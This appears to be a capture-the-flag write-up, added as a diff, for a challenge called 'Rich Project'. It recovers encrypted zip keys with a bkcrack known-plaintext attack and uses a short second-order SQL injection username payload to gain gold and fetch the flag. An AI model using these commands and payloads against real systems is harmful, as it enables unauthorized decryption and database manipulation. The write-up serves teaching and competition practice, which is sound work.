|
| 1 | +## Rich Project |
| 2 | + |
| 3 | +We are given a link to a website. One of the first things we do is check for a robots.txt and we find: |
| 4 | + |
| 5 | +``` |
| 6 | +User-agent : * |
| 7 | +Disallow: /top_secret.zip |
| 8 | +Disallow: / |
| 9 | +``` |
| 10 | + |
| 11 | +We download and try to extract top\_secret.zip but it is encrypted. We can see the filenames though: |
| 12 | + |
| 13 | +``` |
| 14 | +Archive: top_secret.zip |
| 15 | + Length Method Size Cmpr Date Time CRC-32 Name |
| 16 | +-------- ------ ------- ---- ---------- ----- -------- ---- |
| 17 | + 0 Stored 0 0% 01-26-2019 19:31 00000000 __SECRET__/ |
| 18 | + 133 Defl:N 112 16% 01-15-2019 15:53 d2af9447 __SECRET__/flag.php |
| 19 | + 674 Defl:N 340 50% 01-15-2019 17:29 060ffd05 __SECRET__/pricemaker.php |
| 20 | + 0 Stored 0 0% 01-26-2019 19:31 00000000 html/ |
| 21 | + 1506 Defl:N 720 52% 01-26-2019 19:34 47f09190 html/bbs.php |
| 22 | + 1019 Defl:N 526 48% 01-26-2019 19:32 1e4e97d7 html/buy.php |
| 23 | + 0 Stored 0 0% 01-26-2019 19:31 00000000 html/css/ |
| 24 | + 117418 Defl:N 19237 84% 06-12-2018 22:30 3d3550ff html/css/bootstrap.min.css |
| 25 | + 2538 Defl:N 915 64% 01-02-2019 11:26 142a9253 html/css/carousel.css |
| 26 | + 767 Defl:N 291 62% 01-02-2019 14:27 46d946c8 html/css/signin.css |
| 27 | + 201 Defl:N 128 36% 01-15-2019 16:07 27d027b0 html/dbconn.php |
| 28 | + 233 Defl:N 116 50% 01-15-2019 15:42 33a8cd28 html/footer.php |
| 29 | + 1903 Defl:N 713 63% 01-15-2019 16:54 92a27374 html/header.php |
| 30 | + 2656 Defl:N 694 74% 01-15-2019 15:25 3858ab6a html/home.php |
| 31 | + 0 Stored 0 0% 01-26-2019 19:31 00000000 html/images/ |
| 32 | + 133008 Defl:N 132951 0% 01-02-2019 09:22 652cae0e html/images/buy.png |
| 33 | + 12830 Defl:N 12814 0% 01-02-2019 09:41 0d669505 html/images/JB.jpg |
| 34 | + 40394 Defl:N 39571 2% 05-19-2010 11:36 d28f29f5 html/images/rich.jpg |
| 35 | + 1237 Defl:N 257 79% 01-15-2019 16:54 c5b2e10d html/index.php |
| 36 | + 947 Defl:N 501 47% 01-15-2019 15:32 b2c38c37 html/info.php |
| 37 | + 0 Stored 0 0% 01-26-2019 19:31 00000000 html/js/ |
| 38 | + 35652 Defl:N 9460 74% 06-12-2018 22:30 470f81a5 html/js/bootstrap.min.js |
| 39 | + 456243 Defl:N 93095 80% 11-18-2018 02:40 7ceb90fa html/js/canvasjs.min.js |
| 40 | + 305436 Defl:N 104987 66% 01-04-2019 10:00 cebd2607 html/js/echarts.simple.min.js |
| 41 | + 23861 Defl:N 8680 64% 06-12-2018 22:30 e8b790fb html/js/holder.js |
| 42 | + 2132 Defl:N 1021 52% 06-12-2018 22:30 d57479a3 html/js/ie-emulation-modes-warning.js |
| 43 | + 694 Defl:N 426 39% 06-12-2018 22:30 53fa6dd1 html/js/ie10-viewport-bug-workaround.js |
| 44 | + 95931 Defl:N 33303 65% 12-21-2016 03:17 8210596f html/js/jquery.min.js |
| 45 | + 1389 Defl:N 636 54% 01-15-2019 17:26 177d2eef html/login.php |
| 46 | + 71 Defl:N 67 6% 01-15-2019 15:30 93b3559e html/logout.php |
| 47 | + 3464 Defl:N 1287 63% 01-15-2019 15:45 9fc79ea3 html/market.php |
| 48 | + 366 Defl:N 272 26% 01-15-2019 15:48 dfdc5c33 html/pay.php |
| 49 | + 998 Defl:N 505 49% 01-15-2019 16:01 3a666b07 html/read.php |
| 50 | + 1675 Defl:N 769 54% 01-15-2019 16:03 87a85006 html/reg.php |
| 51 | + 922 Defl:N 525 43% 01-26-2019 20:30 7b23d9ce html/reserv.php |
| 52 | + 53 Defl:N 45 15% 01-10-2019 10:05 babd12ec html/robots.txt |
| 53 | + 977 Defl:N 498 49% 01-26-2019 19:32 4c6497e0 html/sell.php |
| 54 | + 1235 Defl:N 567 54% 01-15-2019 15:48 8050f721 html/write.php |
| 55 | + 0 Stored 0 0% 01-15-2019 16:55 00000000 ZIP PASS = MASTER_PW |
| 56 | +-------- ------- --- ------- |
| 57 | + 1248563 466029 63% 39 files |
| 58 | +``` |
| 59 | + |
| 60 | +This indicates that there is a master password somewhere which will give us the zip password. But we can also see that it contains html/js/\* which likely is the same contents as the files under js/ on the live server. This allows us to attempt to break the ZIP encryption using a known plaintext attack with bkcrack ([https://github.com/kimci86/bkcrack](https://github.com/kimci86/bkcrack)). It is important that when we generate the plaintext zip file containing the unencrypted, compressed ie10-viewport-bug-workaround.js, that its compressed size matches the compressed size in top\_secret.zip. If the compressed sizes do not match, then the data is different and the attack will not work. |
| 61 | + |
| 62 | +``` |
| 63 | +$ wget http://110.10.147.112/js/ie10-viewport-bug-workaround.js |
| 64 | +$ wget http://110.10.147.112/top_secret.zip |
| 65 | +$ zip pt.zip ie10-viewport-bug-workaround.js |
| 66 | +$ src/bkcrack -C top_secret.zip -c html/js/ie10-viewport-bug-workaround.js -P pt.zip -p ie10-viewport-bug-workaround.js |
| 67 | +Generated 4194304 Z values. |
| 68 | +[17:53:19] Z reduction using 414 extra bytes of known plaintext |
| 69 | +100.0 % (414 / 414) |
| 70 | +22536 values remaining. |
| 71 | +[17:53:22] Attack on 22536 Z values at index 13 |
| 72 | +10.6 % (2396 / 22536) |
| 73 | +[17:53:51] Keys |
| 74 | +c9a99496 d9c6d6fe 75590659 |
| 75 | +``` |
| 76 | + |
| 77 | +Now we can decrypt the files in the ZIP file: |
| 78 | + |
| 79 | +``` |
| 80 | +$ src/bkcrack -C top_secret.zip -c __SECRET__/flag.php -k c9a99496 d9c6d6fe 75590659 -d flag.php |
| 81 | +[17:56:45] Keys |
| 82 | +c9a99496 d9c6d6fe 75590659 |
| 83 | +Wrote deciphered text. |
| 84 | +$ ../tools/inflate.py < flag.php |
| 85 | +<?php |
| 86 | + $key= "D0_N0T_RE1E@5E_0THER5"; |
| 87 | + $FLAG = "##########" |
| 88 | + if($_GET['key'] === $key) |
| 89 | + die($FLAG); |
| 90 | + else |
| 91 | + die("who you are?"); |
| 92 | +?> |
| 93 | +``` |
| 94 | + |
| 95 | +We analyzed the other PHP files in the ZIP. We can see that pay.php will include flag.php if we have enouch gold: |
| 96 | + |
| 97 | +``` |
| 98 | +<div class="container" style="margin-top:120px"> |
| 99 | +<?php |
| 100 | + if(!isset($_SESSION['ID'])) |
| 101 | + die('login first'); |
| 102 | + $conn = dbconn('tradedata'); |
| 103 | + $q = "SELECT * FROM user_wallet where id='{$_SESSION['ID']}'"; |
| 104 | + $res = mysqli_query($conn,$q); |
| 105 | + $row = mysqli_fetch_array($res); |
| 106 | + if($row['cash'] <999999999) |
| 107 | + die("Not enough gold"); |
| 108 | + else |
| 109 | + include '../__SECRET__/flag.php'; |
| 110 | +?> |
| 111 | +``` |
| 112 | + |
| 113 | +One way to easily have enough gold is if we can inject into the SQL query using the ID field in the session. As we can see from login.php, the ID field comes directly from the database and is not escaped: |
| 114 | + |
| 115 | +``` |
| 116 | +... |
| 117 | + $q = "SELECT * FROM users where id='{$ID}' and pw='{$PW}' and ac='{$AC}'"; |
| 118 | + $res = mysqli_query($conn,$q); |
| 119 | + $row = mysqli_fetch_array($res); |
| 120 | + if($row != NULL) |
| 121 | + { |
| 122 | + $_SESSION['ID'] = strtolower($row['id']); |
| 123 | + header("Location: ./?p=main"); |
| 124 | + die(""); |
| 125 | + } |
| 126 | +... |
| 127 | +``` |
| 128 | + |
| 129 | +Unfortunately, the id field in the database is quite small (maybe 32 bytes), so our SQL injection needs to also be small. We ended up with the following query: |
| 130 | + |
| 131 | +``` |
| 132 | +azz' union select 1,1e10,1,1,1 # |
| 133 | +``` |
| 134 | + |
| 135 | +After registering a user with this ID, logging out, and login with this ID, we can visit /pay.php with the correct key parameter to get the flag. |
| 136 | + |
| 137 | + |
0 commit comments